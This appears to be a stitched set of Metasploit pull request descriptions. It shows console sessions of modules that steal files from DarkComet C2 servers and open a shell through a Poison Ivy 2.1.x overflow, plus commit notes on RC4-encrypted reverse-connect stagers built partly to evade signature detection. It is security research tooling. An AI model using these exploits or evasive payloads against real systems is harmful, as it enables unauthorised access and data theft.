replaced "$1" on line 51 with "Regexp.last_match(1)
restructed the print statement on line 56 to more closely match suggestion
removed "self." from line 71
changed line 78 to loop for 2 seconds insetead of 1 second
(https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf), possibly affecting
earlier versions as well. The vulnerability can be exploited without knowledge of the secret key
by abusing a flaw in the cryptographic protocol to carry out a limited version of the exploit allowing
for key recovery after which the exploit can be used to download arbitrary files from a DarkComet C2 server.
See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.
## Console output
Below is an example of the exploit running against versions 5.3.1 and 4.2F
(DarkComet C2 server password is set to 'darkcometpass' and unknown to attacker).
### Version 5.3.1 (unknown password)
```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST 0.0.0.0 yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC51#-890darkcometpass
KEY => #KCMDDC51#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
### Version 4.2F (unknown password)
```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST 0.0.0.0 yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf auxiliary(darkcomet_filedownloader) > set LHOST 192.168.0.102
LHOST => 192.168.0.102
msf auxiliary(darkcomet_filedownloader) > set NEWVERSION false
NEWVERSION => false
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - Missing 1 bytes of keystream ...
[*] 192.168.0.104:1604 - Initiating brute force ...
[*] 192.168.0.104:1604 - C2 server uses password [darkcometpass]
[*] 192.168.0.104:1604 - Storing data to loot...
[*] Auxiliary module execution completed
msf auxiliary(darkcomet_filedownloader) > set KEY #KCMDDC42F#-890darkcometpass
KEY => #KCMDDC42F#-890darkcometpass
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set TARGETFILE C:\\secret.txt
TARGETFILE => C:\secret.txt
msf auxiliary(darkcomet_filedownloader) > run
[*] 192.168.0.104:1604 - omgsecret
[*] Auxiliary module execution completed
```
in Poison Ivy versions 2.1.x (possibly present in older versions too) and doesn't
require knowledge of the secret key as it abuses a flaw in the cryptographic protocol.
Note that this is a different vulnerability from the one affecting versions 2.2.0 and up
(https://www.rapid7.com/db/modules/exploit/windows/misc/poisonivy_bof).
See http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware
for details.
## Console output
Below is an example of the exploit running against a 2.1.4 C2 server (PIVY C2 server password is
set to 'pivypass' and unknown to attacker).
### Version 2.1.4
```
msf > use windows/misc/poisonivy_21x_bof
msf exploit(poisonivy_21x_bof) > set RHOST 192.168.0.104
RHOST => 192.168.0.104
msf exploit(poisonivy_21x_bof) > check
[*] 192.168.0.104:3460 The target appears to be vulnerable.
msf exploit(poisonivy_21x_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_21x_bof) > exploit
[*] 192.168.0.104:3460 - Performing handshake...
[*] Started bind handler
[*] 192.168.0.104:3460 - Sending exploit...
[*] Command shell session 1 opened (192.168.0.102:56272 -> 192.168.0.104:4444) at 2016-06-03 12:34:02 -0400
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.1.4\Poison Ivy 2.1.4>
```
This scanner module doesn't tell you the location of the found information. So when using the -R option to fill the RHOSTS all you get is a bunch of successful findings, however you won't know to which systems they belong.
Added exploit for HP Data Protector when using encrypted communications.
This has been tested against v9.00 on Windows Server 2008 R2 but should also work against older versions of DP.
Using the ruby methods for generating assembly blocks defined or
separated in prior commits, create a new payload from the existing
assembly blocks which performs a DNS lookup of the LHOST prior to
establishing a corresponding socket and downloading, and
decrypting the RC4 encrypted payload.
For anyone looking to learn how to build these payloads, these
three commits should provide a healthy primer. Small changes to
the payload structure can yield entropy enough to avoid signature
based detection by in-line or out-of-band static defenses. This
payload was completed in the time between this commit and the last.
Testing:
Win2k8r2
ToDo:
Update payload sizes when this branch is "complete"
Ensure UUIDs and adjacent black magic all work properly
Using the separation of block_recv and reverse_tcp, implement
reverse_tcp_dns using original shellcode as template with dynamic
injection of parameters. Concatenate the whole thing in the
generation call chain, and compile the resulting shellcode for
delivery.
Metasploit module pruned to bare minimum, with the LHOST OptString
moved into the library component.
Testing:
Win2k8r2
ToDo:
Update payload sizes when this branch is "complete"
Ensure UUIDs and adjacent black magic all work properly
Misc:
Clean up rc4.rb to use the rc4_keys method when generating a
stage. Makes the implementation far more readable and reduces
redundant code.
Convert reverse_tcp_rc4 and bind_tcp_rc4 from static shellcode
substitution payloads to metasm compiled assembly approach.
Splits up metasm methods for bind_tcp and reverse_tcp into socket
creation and block_recv to allow for reuse of the socket methods
with the RC4 payloads, while substituting the block_recv methods
for those carrying the appropriate decryptor stubs.
Creates a new rc4 module carrying the bulk of the decryptor and
adjacent convenince methods for standard payload generation.
Testing:
Tested against Win2k8r2, Win7x64, and WinXPx86
ToDo:
Ensure all the methods around payload sizing, UUIDs, and other
new functionality, the semantics of which i do not yet fully
understand, are appropriate and do not introduce breakage.
wchen-r7
h00die
William Vu
wwebb-r7
Adam Compton
Crypt0-M3lon
samvartaka
dmohanty-r7
Brendan Watters
Vex Woo
Brent Cook
mr_me
root
sho-luv
Ian Lovering
Tijl Deneut
Bruno Morisson
rastating
Jon Hart
RageLtMan
Spencer McIntyre
root
ssyy201506